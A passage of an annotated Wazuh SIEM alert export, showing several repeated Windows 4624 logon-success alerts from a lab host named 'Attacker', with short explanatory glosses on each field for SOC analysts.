Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:48:03.2396185Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43492
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:33.444+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:33.444+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533893.170713
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:16.7140388Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43494
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:33.639+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:33.639+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533893.178051
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:25.8978248Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43496
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:33.991+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:33.991+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533893.185389
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:52:29.1249111Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43498
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:34.173+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:34.173+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
